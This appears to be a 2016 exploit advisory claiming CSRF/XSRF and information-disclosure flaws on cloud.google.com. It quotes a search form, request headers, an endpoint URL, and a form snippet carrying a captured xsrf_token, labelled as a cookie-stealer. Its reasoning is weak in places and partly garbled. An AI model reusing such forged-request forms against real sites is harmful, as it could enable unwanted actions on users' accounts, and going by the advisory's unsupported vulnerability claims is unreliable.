/************************************************************************************************
[+] Title : Google Cloud CSRF/XSRF
[+] Exploit Author : Ashiyane Digital Security Team
[+] Tested on : Windows - Firefox
[+] Vendor Homepage : http://cloud.google.com
[+] Date : 16 Feb. 2016
*************************************************************************************************/
------------------------------------------------------
Method GET In CSRF Exploitation :
------------------------------------------------------
In a Cross-Site Request Forgery (CSRF or XSRF) attack, a malicious site gets an
unsuspecting user to make a hidden HTTP request back to a legitimate site, forcing
an unintended action. To prevent such attacks, you need to verify that an
incoming HTTP request was made intentionally by an authenticated user and not
triggered by another site. With HTTP GET this is done through a simple hyperlink
containing manipulated parameters, or automatically through an IMG tag whose src
points at the target URL. By the HTTP specification, however, GET should be a safe
method, that is, one that does not significantly change the user's state in the
application or website.
--------------------------------------------------------------
Snippet Of The Index Page Search Form, Used For The Test TEXT Query :
-------------------------------------------------------------
<form action="https://cloud.google.com/s/results" name="Ashexpl" enctype="multipart/form-data" method="get">
<div id="searchbox" class="devsite-searchbox">
<input type="text" placeholder="Put TEXT Here" class="devsite-search-query" name="q" autocomplete="off"></div>
<button id="search-button" class="button button-blue big">
<img src="https://cloud.google.com/_static/8ceb0d7f64/images/v2/search.png" href="javascript:void(0)" alt="Search"></button>
<input type="hidden" name="p" id="search_project" value="" data-project-name="Cloud Platform" data-project-path="" data-query-match=""/>
<input type="hidden" id="suggest-category-label-2" value="Pages in Cloud Platform" />
<input type="hidden" id="suggest-category-label-3" value="Reference in Cloud Platform" />
<input type="hidden" id="suggest-category-label-1" value="Products" />
<input type="hidden" id="suggest-all-results-label" value="See all results for" />
</form>
%%%---------------------------------------------------------------------------------------------------%%%
# The snippet carries no security token, not even a CAPTCHA image, ...
%%%----------------------------------------------------------------------------------------------------%%%
-----------------------------------------------------------------------------
Monitoring The Request With The Live HTTP Headers Add-On :
----------------------------------------------------------------------------
Host: cloud.google.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://cloud.google.com/s/results?q=Put TEXT Here
Connection: keep-alive
-----------------------------------------------------------------------------------------
Warning GET Request (Information Disclosure Vulnerability) :
-----------------------------------------------------------------------------------------
Description :
The vulnerability can be exploited by remote attackers without any privileges
on the Cloud system: a plain GET request returns the Cloud details.
Vulnerability : https://cloud.google.com/_s/getsuggestions?hl=en&s=cloud&c=1
///--------------------------------------------------------------------------------------------------------------------------------------///
-------------------------------
XSRF Exploitation :
-------------------------------
The browser's same-origin restriction on cookies means that a malicious domain
will not be able to echo cookie values in any sort of programmatic way, such as
injecting them as an HTTP header.
When you make requests using the $http service (or anything built on top
of $http, like $resource), AngularJS will look for the existence of the
"XSRF-TOKEN" cookie. If it finds it, it will append the cookie value as
the outgoing HTTP header "X-XSRF-TOKEN". This means that once you set the XSRF
token cookie, AngularJS sends two tokens with each HTTP AJAX request:
[+] The cookie, XSRF-TOKEN.
[+] The header, X-XSRF-TOKEN.
--------------------------------------------
XSRF Token in GET request :
--------------------------------------------
https://tools.digitalpoint.com/cookie-search?action=cloud.google.com
Among the Google subdomain cookies seen in the last 24h is the XSRF-TOKEN cookie, which can be viewed with:
Browser Firefox : view-source:https://cloud.google.com/
-------------------------------------------------------
XSRF Exploitation & Cookie Stealer :
-------------------------------------------------------
Description :
This form carries the xsrf_token value, which is visible to anyone who visits the page;
it can be stolen and submitted together with attacker-chosen data. Snippet code :
<form action="https://cloud.google.com/i18n/setlang/" method="post">
<input type="hidden" name="xsrf_token" value="kkLdJ1sQCXWmd7KAKiKNgAfVJhGqDVU-OXlcyiwb2wk6MTQ1NTIxNTEwMjkwOTI5MA" />
<select name="language" onchange="this.form.submit(); return false;">
<option value="en" selected>English</option>
<option value="ja">日本語</option>
</select>
</form>
///-----------------------------------------------------------------------///
/--------------------------------------------------
Discovered By Und3rgr0und
-------------------------------------------------/